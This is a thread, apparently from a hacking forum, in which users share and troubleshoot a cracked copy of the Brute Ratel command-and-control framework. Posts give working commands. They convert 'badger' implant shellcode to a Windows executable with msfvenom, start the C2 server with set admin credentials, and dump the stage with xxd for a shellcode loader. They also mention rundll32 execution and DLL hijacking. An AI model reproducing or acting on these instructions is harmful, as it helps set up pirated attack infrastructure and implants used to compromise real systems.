Posts: 27 Threads: 0 Joined: N/A September 23, 2022 at 4:42 PM issue is the cracked version only supporting stage-less badger with shell code option also no non-service executable build option ( which i good help so many skids wont use it for them hard to make a simple shell code loader ) also instead of venom shell code loader u can also use another shell code loader or use dll build for dll hijacking method Posts: 32 Threads: 0 Joined: N/A September 24, 2022 at 6:53 AM (September 23, 2022, 04:42 PM)mrx325 Wrote: issue is the cracked version only supporting stage-less badger with shell code option also no non-service executable build option ( which i good help so many skids wont use it for them hard to make a simple shell code loader )
also instead of venom shell code loader u can also use another shell code loader or use dll build for dll hijacking method
Did you try to enable stage on your listener ? Posts: 5 Threads: 0 Joined: N/A September 24, 2022 at 12:16 PM you need to enable stage on listener and know how to compile the stage because it may crash. Posts: 32 Threads: 0 Joined: N/A September 24, 2022 at 8:02 PM (September 24, 2022, 12:16 PM)crazygama Wrote: you need to enable stage on listener and know how to compile the stage because it may crash. exactly, you can xxd -i stage.bin > shellcode.h then use profile in adhoc script folder to run the shellcode Posts: 25 Threads: 0 Joined: N/A September 24, 2022 at 8:06 PM thanks for sharing this Posts: 22 Threads: 0 Joined: N/A September 27, 2022 at 8:27 PM (September 22, 2022, 12:19 PM)msec Wrote: (September 22, 2022, 01:14 AM)0dayzay Wrote: (September 21, 2022, 03:35 PM)bcamelo Wrote: can you share exact commands to start/run c2 server? apparently i got a PAGE NOT FOUND when access webpage...
You have to run the commander to build a stub that connects back to the server.
It appear to have problems with payload generation. all payloads are stagless, just tried badger via rundll32 it works.
You can try msfvenom to feed the shellcode from stdin
cat badger.bin | msfvenom -p - -f exe --platform win -a x64 -o badger.exe
(September 21, 2022, 03:35 PM)bcamelo Wrote: can you share exact commands to start/run c2 server? apparently i got a PAGE NOT FOUND when access webpage...
./brute-ratel-linx64 -ratel -a admin -p admin@123 -h 0.0.0.0:1337 -sc cert.pem -sk key.pem ./commander-runme what are the credentials of c2 host,username and password Posts: 5 Threads: 0 Joined: N/A September 28, 2022 at 1:01 PM (September 27, 2022, 08:27 PM)Nina Wrote: (September 22, 2022, 12:19 PM)msec Wrote: (September 22, 2022, 01:14 AM)0dayzay Wrote: (September 21, 2022, 03:35 PM)bcamelo Wrote: can you share exact commands to start/run c2 server? apparently i got a PAGE NOT FOUND when access webpage...
You have to run the commander to build a stub that connects back to the server.
It appear to have problems with payload generation. all payloads are stagless, just tried badger via rundll32 it works.
You can try msfvenom to feed the shellcode from stdin
cat badger.bin | msfvenom -p - -f exe --platform win -a x64 -o badger.exe
(September 21, 2022, 03:35 PM)bcamelo Wrote: can you share exact commands to start/run c2 server? apparently i got a PAGE NOT FOUND when access webpage...
./brute-ratel-linx64 -ratel -a admin -p admin@123 -h 0.0.0.0:1337 -sc cert.pem -sk key.pem ./commander-runme
what are the credentials of c2 host,username and password You define them with -a and -p options. Posts: 0 Threads: 0 Joined: N/A September 28, 2022 at 6:48 PM Thanks man! I was looking for this too long! Posts: 3 Threads: 0 Joined: N/A September 29, 2022 at 6:27 PM thanks for sharing bruteratel Posts: 14 Threads: 0 Joined: N/A September 29, 2022 at 7:45 PM thanks for sharing |